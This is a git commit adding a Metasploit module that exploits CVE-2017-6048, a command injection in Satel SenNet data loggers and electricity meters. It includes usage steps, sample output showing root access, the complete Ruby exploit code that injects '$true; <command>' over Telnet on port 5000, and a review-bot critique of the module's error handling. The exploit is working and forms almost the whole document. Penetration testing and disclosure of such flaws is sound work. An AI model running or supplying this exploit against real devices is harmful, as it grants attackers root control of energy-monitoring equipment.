Land #8205, Add Satel SenNet Command Exec Module

bug/bundler_fix
Brent Cook 2017-06-25 18:01:44 -05:00
commit 05c72214ae
No known key found for this signature in database
GPG Key ID: 1FFAA0B24B708F96
2 changed files with 99 additions and 0 deletions


@ -0,0 +1,28 @@
This module exploits an OS Command Injection vulnerability in Satel SenNet Data Logger and Electricity Meters to perform arbitrary command execution as 'root'.
The following versions of SenNet Data Logger and Electricity Meters, monitoring platforms, are affected:
1. SenNet Optimal DataLogger V5.37c-1.43c and prior,
2. SenNet Solar Datalogger V5.03-1.56a and prior, and
3. SenNet Multitask Meter V5.21a-1.18b and prior.
## Verification Steps
1. Do: ```use auxiliary/scanner/telnet/satel_cmd_exec```
2. Do: ```set RHOSTS [IP]```
3. Do: ```set RPORT [PORT]```
4. Do: ```run```
## Sample Output
```
msf > use auxiliary/scanner/telnet/satel_cmd_exec
msf auxiliary(satel_cmd_exec) > set rhosts 1.3.3.7
msf auxiliary(satel_cmd_exec) > run
[*] 1.3.3.7:5000 - Sending command now - id;
[+] 1.3.3.7:5000 - uid=0(root) gid=0(root)
[+] 1.3.3.7:5000 - File saved in: /root/.msf4/loot/20000000000003_1.3.3.7_cmdexeclog_12345.txt
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```


@ -0,0 +1,71 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::Telnet
include Msf::Auxiliary::Report
include Msf::Auxiliary::Scanner
def initialize(info = {})
super(update_info(info,
'Name' => 'Satel Iberia SenNet Data Logger and Electricity Meters Command Injection Vulnerability',
'Description' => %q{
This module exploits an OS Command Injection vulnerability in Satel Iberia SenNet Data Loggers & Electricity Meters
to perform arbitrary command execution as 'root'.
},
'References' =>
[
[ 'CVE', '2017-6048' ],
[ 'URL', 'https://ipositivesecurity.com/2017/04/07/sennet-data-logger-appliances-and-electricity-meters-multiple-vulnerabilties/' ],
[ 'URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-17-131-02' ]
],
'Author' =>
[
'Karn Ganeshen <KarnGaneshen[at]gmail.com>'
],
'DisclosureDate' => 'Apr 07, 2017',
'License' => MSF_LICENSE,
'DefaultOptions' => { 'VERBOSE' => true })
)
register_options(
[
Opt::RPORT(5000),
OptInt.new('TIMEOUT', [true, 'Timeout for the Telnet probe', 30]),
OptString.new('CMD', [true, 'Command(s) to run', 'id'])
], self.class
)
deregister_options('USERNAME', 'PASSWORD')
end
def run_host(ip)
to = (datastore['TIMEOUT'].zero?) ? 30 : datastore['TIMEOUT']
begin
::Timeout.timeout(to) do
command = datastore['CMD']
inject = "$true; #{command}"
res = connect
print_status("Sending command now - #{command}")
sock.puts(inject)
data = sock.get_once(-1, to)
print_good("#{data}")
loot_name = 'cmd-exec-log'
loot_type = 'text/plain'
loot_desc = 'Satel SenNet CMD Exec Dump'
p = store_loot(loot_name, loot_type, datastore['RHOST'], data, loot_desc)
print_good("File saved in: #{p}")
end
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError
print_error("#{rhost}:#{rport} - Connection Failed...")
return false
ensure
disconnect
end
end
end
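Review bot: In `run_host`, `sock.get_once(-1, to)` can return nil or an empty string, yet the following lines call `print_good` and `store_loot` unconditionally, so a host that sent nothing back is reported as a hit and an empty loot entry is recorded. A guard right after the read, such as `return print_error("#{rhost}:#{rport} - No response received") if data.to_s.empty?`, would avoid that false positive. Even when data arrives it is never checked, so whatever banner the service returns is presented as command output; this limitation should at least be documented in a comment. The `::Timeout::Error` raised by the `::Timeout.timeout(to)` wrapper is not in the rescue list, and `res = connect` is assigned but never used. In a scanner module, `store_loot` would also read more clearly with the `ip` argument than with `datastore['RHOST']`.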